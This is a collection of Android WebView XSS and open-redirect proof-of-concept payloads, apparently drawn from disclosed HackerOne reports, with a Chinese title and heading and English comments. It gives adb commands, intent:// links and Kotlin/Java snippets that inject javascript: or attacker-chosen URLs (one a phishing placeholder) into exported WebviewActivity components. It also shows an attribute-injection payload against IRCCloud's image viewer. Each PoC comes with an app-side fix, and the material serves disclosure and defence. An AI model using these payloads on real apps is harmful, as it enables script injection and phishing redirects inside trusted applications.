Android 应用中的 XSS 和开放重定向 payload

xss1

来源:https://hackerone.com/reports/2555949

payload:

# PoC from the report: WebviewActivity takes the page to show from the "URL" string extra.
# The alert firing on a javascript: value indicates the extra reaches the WebView without
# scheme validation; the second command shows the same extra opening an arbitrary https URL
# inside the app (open redirect). App-side fix: accept only http/https URLs, ideally against a
# host allowlist, before the WebView loads them, or do not export the activity.
adb shell am start -n ████/████████.kotlin.MVVM.Utils.Web.WebviewActivity --es URL "javascript:(function() { alert('XSS by Cleanchain') })();"
adb shell am start -n ████████/███.kotlin.MVVM.Utils.Web.WebviewActivity --es URL "https://URL"

<!-- PoC from the report: an intent:// link from a web page sets the S.URL string extra of the
     exported WebviewActivity (scheme mymos). The first link carries a javascript: value that runs
     in the app's WebView; the second shows the open-redirect variant with an arbitrary https URL.
     Mitigation belongs in the app: validate the scheme (http/https only) and host before loading,
     or do not export the activity. -->
<body>
    <a href="intent://app/feedback#Intent;scheme=mymos;package=█████████;S.URL=javascript:(function() { alert('XSS by Cleanchain') })();end">Open XSS</a>

    <a href="intent://app/feedback#Intent;scheme=mymos;package=█████████;S.URL=https://URL;end">Open URL</a>

</body>



// PoC from the report: WebviewActivity loads whatever the "URL" string extra contains, and a
// javascript: value executes in the app's WebView (the alert fires). The fix belongs in
// WebviewActivity: reject any scheme other than http/https (ideally with a host allowlist)
// before the WebView loads the value, or stop exporting the activity.
val webviewIntent = Intent()
webviewIntent.setClassName("█████", "███████.kotlin.MVVM.Utils.Web.WebviewActivity")
webviewIntent.putExtra("URL", "javascript:(function() { alert('XSS by Cleanchain') })()")
startActivity(webviewIntent)

// PoC: the same extra accepts an arbitrary https URL, so any external page can be opened inside
// the app's WebView (open redirect). Same app-side fix: allowlist the host before loading.
startActivity(Intent().also {
    it.setClassName("████", "██████.kotlin.MVVM.Utils.Web.WebviewActivity")
    it.putExtra("URL", "https://URL")
})



# PoC for the second app: same pattern, a WebviewActivity that loads the "URL" string extra as-is.
# javascript: value -> script runs in the WebView; https value -> arbitrary page inside the app.
# App-side fix: validate scheme (http/https only) and host before loading, or do not export the activity.
adb shell am start -n ██████████/███████.Utils.Web.WebviewActivity --es URL "javascript:(function() { alert('XSS by Cleanchain') })();"
adb shell am start -n ██████/█████████.Utils.Web.WebviewActivity --es URL "https://URL"



<!-- PoC for the second app: intent:// links (scheme chdr) set the S.URL extra of the exported
     WebviewActivity from a web page. First link: javascript: value executed in the WebView;
     second link: open redirect to an arbitrary https URL. Mitigation belongs in the app:
     restrict the scheme to http/https and allowlist the host, or do not export the activity. -->
<body>
    <a href="intent://app/feedback#Intent;scheme=chdr;package=██████████;S.URL=javascript:(function() { alert('XSS by Cleanchain') })();end">Open XSS - █████████</a>

    <a href="intent://app/feedback#Intent;scheme=chdr;package=███;S.URL=https://URL;end">Open URL - ███</a>

</body>


// PoC for the second app: the "URL" extra is loaded by WebviewActivity without scheme
// validation, so a javascript: value runs in the WebView. Fix on the app side: accept only
// http/https URLs from an allowlisted host, or stop exporting the activity.
startActivity(Intent().also {
    it.setClassName("██████", "████████.Utils.Web.WebviewActivity")
    it.putExtra("URL", "javascript:(function() { alert('XSS by Cleanchain') })()")
})

// PoC: open-redirect variant — an arbitrary https URL is opened inside the app's WebView.
// Same app-side fix: allowlist the host before loading.
val redirectIntent = Intent()
redirectIntent.setClassName("███████", "████████.Utils.Web.WebviewActivity")
redirectIntent.putExtra("URL", "https://URL")
startActivity(redirectIntent)




<!-- PoC for the third app (scheme mymos): the S.URL extra is loaded by the exported
     WebviewActivity as-is. First link: javascript: value executed in the WebView; second
     link: the app's WebView is redirected to an attacker-chosen page (phishing-site.com is a
     placeholder). Mitigation belongs in the app: http/https only plus a host allowlist, or
     do not export the activity. -->
<body>
<a href="intent://app/feedback#Intent;scheme=mymos;package=██████████;S.URL=javascript:(function() { alert('XSS by Cleanchain') })();end">Open XSS</a>
<a href="intent://app/feedback#Intent;scheme=mymos;package=█████████;S.URL=https://phishing-site.com;end">Open Phishing Page</a>
</body>





// PoC for the third app: WebviewActivity loads the "URL" string extra unchecked, so a
// javascript: value executes in the WebView. App-side fix: validate scheme (http/https) and
// host before loading, or do not export the activity.
val webviewIntent = Intent()
webviewIntent.setClassName("██████", "████.kotlin.MVVM.Utils.Web.WebviewActivity")
webviewIntent.putExtra("URL", "javascript:(function() { alert('XSS by Cleanchain') })()")
startActivity(webviewIntent)

// PoC: open-redirect variant — the app's WebView is pointed at an arbitrary external page
// (phishing-site.com is a placeholder). Same app-side fix: allowlist the host before loading.
startActivity(Intent().also {
    it.setClassName("███", "████████.kotlin.MVVM.Utils.Web.WebviewActivity")
    it.putExtra("URL", "https://phishing-site.com")
})

方法中的参数未经转义直接拼接进 HTML，因此可以用来执行 XSS

来源:https://hackerone.com/reports/283063

原app的方法:

private void loadImage(String urlStr) {
try {
// ...
this.mImage.loadDataWithBaseURL(null, "<!DOCTYPE html>\n<html><head><style>html, body, table { height: 100%; width: 100%; background-color: #000;}</style></head>\n<body>\n<table><tr><td><img src='" + new URL(urlStr).toString() + "' width='100%' onerror='Android.imageFailed()' onclick='Android.imageClicked()' style='background-color: #fff;'/>\n</td></tr></table></body>\n</html>", "text/html", "UTF-8", null);

poc:

// PoC from the report: loadImage (above) concatenates the Intent data URL into the
// <img src='...'> attribute without escaping, so a single quote in the URL closes the
// attribute and the injected onload handler runs in the WebView (here it navigates to an
// external page). The fix belongs in loadImage: HTML-escape the URL (or build the page
// without string concatenation) and restrict the scheme to http/https.
Intent viewer = new Intent()
        .setClassName("com.irccloud.android", "com.irccloud.android.activity.ImageViewerActivity")
        .setData(Uri.parse("https://shoppersocial.me/wp-content/uploads/2016/06/wow.jpg' onload='window.location.href=\"http://yahoo.com\""));
startActivity(viewer);